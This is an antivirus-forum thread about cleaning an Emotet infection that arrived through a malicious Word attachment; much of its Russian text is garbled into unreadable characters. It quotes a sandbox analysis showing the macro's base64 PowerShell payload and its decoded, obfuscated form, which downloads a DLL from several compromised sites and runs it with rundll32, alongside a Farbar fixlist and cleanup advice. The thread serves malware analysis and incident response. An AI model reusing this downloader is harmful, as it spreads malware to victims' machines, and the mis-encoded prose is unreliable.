�� esetnod32.ru [��: WORD � ��]

WORD � ��

Fri, 01 Jan 2021 18:56:44 +0300

WORD � �� Win32/Emotet.gen � �� .
https://app.any.run/tasks/b8e10aa1-e3d9-4f6f-86fc-e428c9359537

"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ARC 2020_12_29 MC57559.doc"

+

====quote====
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHAAcABiAD0AJABIADQAXwBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABRADAAMQBRADsAJABFADEANQBOAD0AKAAoACcATwAnACsAJwAxAF8AJwApACsAJwBWACcAKQA7ACAAIAAoACAAZwBlAFQALQBWAGEAUgBpAGEAYgBsAGUAIAB1ADYAMwA1ADEAIAAtAFYAYQBMAFUARQBvAE4ATAB5ACAAKQA6ADoAIgBjAFIARQBgAEEAVABlAGQASQByAGAAZQBDAGAAVABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAB9AE4AJwArACgAJwBzAGcAaAAnACsAJwBvACcAKQArACcAaAB0AHsAMAB9ACcAKwAnAEcAJwArACcAYgAnACsAKAAnAGgANQByACcAKwAnADkAbwAnACkAKwAnAHsAMAB9ACcAKQAgAC0AZgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKQA7ACQATgA5ADUAVwA9ACgAKAAnAFMAJwArACcAMgA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgACAATABzACAAIAB2AEEAcgBJAEEAQgBsAGUAOgBvAGwAVgApAC4AVgBBAGwAVQBFADoAOgAiAFMARQBDAFUAcgBgAEkAVABZAGAAUAByAE8AVABPAGAAYwBvAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAxACcAKwAnADIAJwApACkAOwAkAEsAXwAyAEwAPQAoACcAQgA2ACcAKwAnADcATwAnACkAOwAkAEIAZQB4AG8AMgA4AHQAIAA9ACAAKAAnAFEAMgAnACsAJwA3AFYAJwApADsAJABNADYAOQBOAD0AKAAoACcAVQAnACsAJwA3ADIAJwApACsAJwBBACcAKQA7ACQAWgBjADcAbgA3AHkAXwA9ACQASABPAE0ARQArACgAKAAnAHsAJwArACcAMAAnACsAJwB9ACcAKwAoACcATgAnACsAJwBzAGcAJwApACsAJwBoAG8AaAB0AHsAMAB9ACcAKwAnAEcAJwArACgAJwBiACcAKwAnAGgANQByACcAKQArACcAOQBvAHsAMAB9ACcAKQAgAC0ARgBbAEMASABBAFIAXQA5ADIAKQArACQAQgBlAHgAbwAyADgAdAArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBfADEAVwA9ACgAKAAnAE0AJwArACcAMwA0ACcAKQArACcAWQAnACkAOwAkAEkAbABlAF8AdgBhAGEAPQAoACcAXQAnACsAKAAnAGIAMgAnACsAJwBbACcAKwAnAHMAOgAvAC8AdwAnACsAJwBoAGUAZQBsACcAKQArACcAYwBvACcAKwAnAG0AbwAnACsAJwB2AGkAJwArACgAJwBuACcAKwAnAGcALgBjAG8AJwArACcAbQAvAHAAJwApACsAJwAvAFIAJwArACcAdQAnACsAJwBNACcAKwAoACcAZQBSAFAAJwArACcAYQAnACkAKwAnAC8AQAAnACsAKAAnAF0AJwArACcAYgAyAFsAcwA6AC8AJwApACsAKAAnAC8AJwArACcAMAAwACcAKQArACcAegAnACsAKAAnAHkAJwArACcAawB1ACcAKQArACcALgAnACsAJwBjAG8AJwArACgAJwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuAC8AJwArACcAZQAnACkAKwAoACcAWQB1ADEAJwArACcAUQAvACcAKQArACcAQABdACcAKwAnAGIAJwArACgAJwAyAFsAJwArACcAcwA6AC8ALwBrACcAKQArACgAJwBlACcAKwAnAHQAbwByAGUAJwApACsAKAAnAHMAZQAnACsAJwB0AG0AJwApACsAKAAnAGUAJwArACcALgBjAG8AbQAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAHAAbQBKACcAKQArACcALwAnACsAKAAnAEAAJwArACcAXQBiACcAKQArACcAMgAnACsAKAAnAFsAJwArACcAcwBzADoALwAnACsAJwAvACcAKQArACgAJwByAHkAYwBvACcAKwAnAG0AJwApACsAJwBwACcAKwAoACcAdQB0ACcAKwAnAGUAJwApACsAJwByAC4AJwArACgAJwBjAG8AbQAvAGMAJwArACcAbwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0AC8AVAAnACkAKwAoACcATAAvAEAAXQAnACsAJwBiACcAKwAnADIAWwBzACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAZAAtACcAKwAoACcAYwAnACsAJwBlAG0AJwArACcALgBjAG8AbQAnACkAKwAnAC8AJwArACcAdwBwACcAKwAoACcALQBhACcAKwAnAGQAJwApACsAKAAnAG0AJwArACcAaQBuACcAKQArACcALwAnACsAKAAnAEoAJwArACcAUwBMAHcARwAxACcAKQArACgAJwAvAEAAXQBiADIAWwBzACcAKwAnADoAJwArACcALwAnACkAKwAnAC8AJwArACgAJwB0AGgAZQBiAGUAcwAnACsAJwB0ACcAKQArACcAZgAnACsAKAAnAGkAawByAGEAJwArACcAaAAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKwAnAGkAJwArACcAbgAvACcAKQArACgAJwBmACcAKwAnAE8ASQBsACcAKwAnAFYAWAAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAJwApACsAKAAnAHMAcwA6AC8AJwArACcALwAnACkAKwAoACcAcABoACcAKwAnAGEAdwAnACkAKwAoACcAYQB5AGEAJwArACcAZwBlACcAKQArACcAbgAnACsAKAAnAGMAeQAnACsAJwAuAGMAbwBtAC8AJwApACsAJwB3ACcAKwAnAHAAJwArACgAJwAtACcAKwAnAGEAZAAnACkAKwAnAG0AaQAnACsAJwBuACcAKwAoACcALwAnACsAJwBtAFgAbwAnACkAKwAnADQAYgAnACsAJwAvACcAKQAuACIAcgBlAHAAYABMAGAAQQBDAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyAFsAJwApACsAJwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAYABwAEwASQBUACIAKAAkAEUAXwBfAFYAIAArACAAJABZAHQAZABfAHAAcABiACAAKwAgACQAQwA1ADQAWQApADsAJABKADMANwBWAD0AKAAoACcARwA1ACcAKwAnADIAJwApACsAJwBDACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWQBmAHAAZAB2AHUAcgAgAGkAbgAgACQASQBsAGUAXwB2AGEAYQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQB3AC0AJwArACcATwBiACcAKwAnAGoAZQBjAHQAJwApACAAUwBZAHMAdABlAG0ALgBuAEUAdAAuAHcAZQBiAGMATABpAEUAbgBUACkALgAiAEQAbwBXAGAATgBgAGwAYABvAGEAZABmAEkAbABlACIAKAAkAFkAZgBwAGQAdgB1AHIALAAgACQAWgBjADcAbgA3AHkAXwApADsAJABXADAAMgBIAD0AKAAnAEMAJwArACgAJwA1ADkAJwArACcAWAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABaAGMANwBuADcAeQBfACkALgAiAEwARQBuAEcAYABUAEgAIgAgAC0AZwBlACAAMwA4ADQAMQAzACkAIAB7AC4AKAAnAHIAJwArACcAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFoAYwA3AG4ANwB5AF8ALAAoACcAQwBvACcAKwAoACcAbgB0ACcAKwAnAHIAbwAnACkAKwAoACcAbABfAFIAJwArACcAdQAnACsAJwBuAEQATAAnACkAKwAnAEwAJwApAC4AIgB0AG8AcwB0AGAAUgBgAEkATgBHACIAKAApADsAJABVADcAOABXAD0AKAAnAE0AMAAnACsAJwAxAE4AJwApADsAYgByAGUAYQBrADsAJABGADIANABUAD0AKAAnAEsAJwArACgAJwAzACcAKwAnADgATAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQAzADEASQA9ACgAJwBWACcAKwAoACcAOAAnACsAJwA4AEoAJwApACkA
=============

+
in /v Word experienced an error trying to open the file.
+
�� :

====quote====
POwersheLL -w hidden $U6351=[TYpE]("{2}{0}{1}{4}{3}{5}" -F 'ySTEm.i','O.di','s','EcTO','R','RY') ;$OLV = [tYpe]("{0}{7}{1}{8}{3}{6}{5}{2}{4}" -F'sY','TEm.NE','ntmAN','v','AGeR','I','iCePO','s','T.seR') ; $ErrorActionPreference = ('Si'+('le'+'n')+'t'+('ly'+'C')+('onti'+'n'+'ue'));$Ytd_ppb=$H4_L + [char](64) + $Q01Q;$E15N=(('O'+'1_')+'V'); ( geT-VaRiable u6351 -VaLUEoNLy )::"cRE`ATedIr`eC`Tory"($HOME + (('{0}N'+('sgh'+'o')+'ht{0}'+'G'+'b'+('h5r'+'9o')+'{0}') -f [cHaR]92));$N95W=(('S'+'28')+'S'); ( Ls vArIABle:olV).VAlUE::"SECUr`ITY`PrOTO`coL" = ('Tl'+('s1'+'2'));$K_2L=('B6'+'7O');$Bexo28t = ('Q2'+'7V');$M69N=(('U'+'72')+'A');$Zc7n7y_=$HOME+(('{'+'0'+'}'+('N'+'sg')+'hoht{0}'+'G'+('b'+'h5r')+'9o{0}') -F[CHAR]92)+$Bexo28t+('.d'+'ll');$N_1W=(('M'+'34')+'Y');$Ile_vaa=(']'+('b2'+'['+'s://w'+'heel')+'co'+'mo'+'vi'+('n'+'g.co'+'m/p')+'/R'+'u'+'M'+('eRP'+'a')+'/@'+(']'+'b2[s:/')+('/'+'00')+'z'+('y'+'ku')+'.'+'co'+('m/w'+'p'+'-admin/'+'e')+('Yu1'+'Q/')+'@]'+'b'+('2['+'s://k')+('e'+'tore')+('se'+'tm')+('e'+'.com')+'/w'+'p'+('-'+'cont')+('e'+'nt/pmJ')+'/'+('@'+']b')+'2'+('['+'ss:/'+'/')+('ryco'+'m')+'p'+('ut'+'e')+'r.'+('com/c'+'on')+('ten'+'t/T')+('L/@]'+'b'+'2[s'+'s')+(':'+'//')+'d-'+('c'+'em'+'.com')+'/'+'wp'+('-a'+'d')+('m'+'in')+'/'+('J'+'SLwG1')+('/@]b2[s'+':'+'/')+'/'+('thebes'+'t')+'f'+('ikra'+'h.'+'co')+'m'+('/wp-'+'adm'+'i'+'n/')+('f'+'OIl'+'VX/@')+(']b2'+'[')+('ss:/'+'/')+('ph'+'aw')+('aya'+'ge')+'n'+('cy'+'.com/')+'w'+'p'+('-'+'ad')+'mi'+'n'+('/'+'mXo')+'4b'+'/')."rep`L`ACE"(((']b'+'2[')+'s'),([array]('sd','sw'),('h'+('tt'+'p')),'3d')[1])."s`pLIT"($E__V + $Ytd_ppb + $C54Y);$J37V=(('G5'+'2')+'C');foreach ($Yfpdvur in $Ile_vaa){try{(.('New-'+'Ob'+'ject') SYstem.nEt.webcLiEnT)."DoW`N`l`oadfIle"($Yfpdvur, $Zc7n7y_);$W02H=('C'+('59'+'X'));If ((.('Get-I'+'tem') $Zc7n7y_)."LEnG`TH" -ge 38413) {.('r'+'un'+'dll32') $Zc7n7y_,('Co'+('nt'+'ro')+('l_R'+'u'+'nDL')+'L')."tost`R`ING"();$U78W=('M0'+'1N');break;$F24T=('K'+('3'+'8L'))}}catch{}}$A31I=('V'+('8'+'8J'))
=============

+
====quote====

"C:\Windows\system32\rundll32.exe" C:\Users\admin\Nsghoht\Gbh5r9o\Q27V.dll Control_RunDLL
=============
+
====quote====

C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Vcfjrqyglb\qernwsuxr.kiv",Control_RunDLL

=============
https://www.virustotal.com/gui/file/f7440143fa4180db96d5e22f38a07fab5fd56f4912e542bdd8e0a3dc65fc5f68/detection
+

====quote====
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe4_ Global\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
=============

01.01.2021 18:56:44, santy.

WORD � ��

Fri, 01 Jan 2021 18:35:55 +0300

WORD � �� Win32/Emotet.gen � �� .

====quote====
RP55 RP55 ��:
�� Win32/Emotet.gen ��
=============

�� Emotet �� 21 �� [1, 2], � Microsoft �� , �� , �� . �� , �� ".

�� Emotet ��-�� , �� , �� Emotet�, - �� Microsoft Security Intelligence.

Emotet �� 2014 �� , �� TA542 (�� Mummy Spider) �� .

�� , �� Emotet �� , �� QakBot � Trickbot (�� -�� Ryuk � Conti).
01.01.2021 18:35:55, santy.

WORD � ��

Tue, 29 Dec 2020 18:16:30 +0300

WORD � �� Win32/Emotet.gen � �� .

====quote====
��;�� ;�� ;��;��;��;��;��;��;��
29.12.2020 11:59:38;�� HTTP;��; wheelcomoving.com/p/RuMeRPa;��, �� Win32/Emotet.gen �� ;�� ;ANDREW\Admin;�� : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
=============

�� : wheelcomoving.com/p/RuMeRPa

https://urlhaus.abuse.ch/url/944378/
https://www.virustotal.com/gui/url/62f9d2b7e74fdf07456084d5b1907bbe6ce4ac300a3d609e18b51984a5056722/detection

�� "��" ��.
29.12.2020 18:16:30, RP55 RP55.

WORD � ��

Tue, 29 Dec 2020 17:59:15 +0300

WORD � �� Win32/Emotet.gen � �� .
��
��.txt
29.12.2020 17:59:15, �� .

WORD � ��

Tue, 29 Dec 2020 16:45:37 +0300

WORD � �� Win32/Emotet.gen � �� .

====quote====
�� :
(�� .�� ).
=============
�� safety@chklst.ru �� , �� infected
+
��
29.12.2020 16:45:37, santy.

WORD � ��

Tue, 29 Dec 2020 16:32:26 +0300

WORD � �� Win32/Emotet.gen � �� .
��.
�� ESET, �� , �� .
�� .
��!
AdwCleaner[C00].txt
Fixlog.txt
29.12.2020 16:32:26, �� .

WORD � ��

Tue, 29 Dec 2020 13:53:48 +0300

WORD � �� Win32/Emotet.gen � �� .
�� .
�� . ( �� - �� )

�� fixlist.txt � �� Farbar Recovery Scan Tool:
...
�� FRST � �� Fix � ��.

====code====

  

ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} =>  -> No File
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> No File
ContextMenuHandlers1: [WorkFolders] -> {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} =>  -> No File
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} =>  -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} =>  -> No File
ContextMenuHandlers4: [WorkFolders] -> {E61BF828-5E63-4287-BEF1-60B1A4FDE0E3} =>  -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> No File
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\��� ������������\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-19\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-20\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
HKU\S-1-5-21-1585131043-1017290590-1199785018-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION

EmptyTemp:
Reboot:

=============
�� FRST �� -�� (Fixlog.txt). ��, �� !

+
�� AdwCleaner
http://forum.esetnod32.ru/forum9/topic7084/

�� :
�� Mail.Ru � Yandex �� ( �� )
�� :
�� (Folders) �� Mail.Ru � Yandex �� [V]

�� AdwCleaner �� (Clean), ��
� ��

��, �� ...
�
�� _�� .
29.12.2020 13:53:48, RP55 RP55.

WORD � ��

Tue, 29 Dec 2020 12:42:50 +0300

WORD � �� Win32/Emotet.gen � �� .
�� FRST
Addition.txt
FRST.txt
29.12.2020 12:42:50, �� .

WORD � ��

Tue, 29 Dec 2020 12:33:43 +0300

WORD � �� Win32/Emotet.gen � �� .
�� !
�� Word, �� "��" �� (�� , � �� assistenzabck@saetpd.it.
�� (�� ). �� , �� .
�� .
(�� .�� ).
�� , �� )
��!
ANDREW_2020-12-29_12-28-14_v4.11.rar
29.12.2020 12:33:43, �� .

����� esetnod32.ru [����: WORD � ��������]

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

WORD � ��������

�� esetnod32.ru [��: WORD � ��]

WORD � ��

WORD � ��

WORD � ��

WORD � ��

WORD � ��

WORD � ��

WORD � ��

WORD � ��

WORD � ��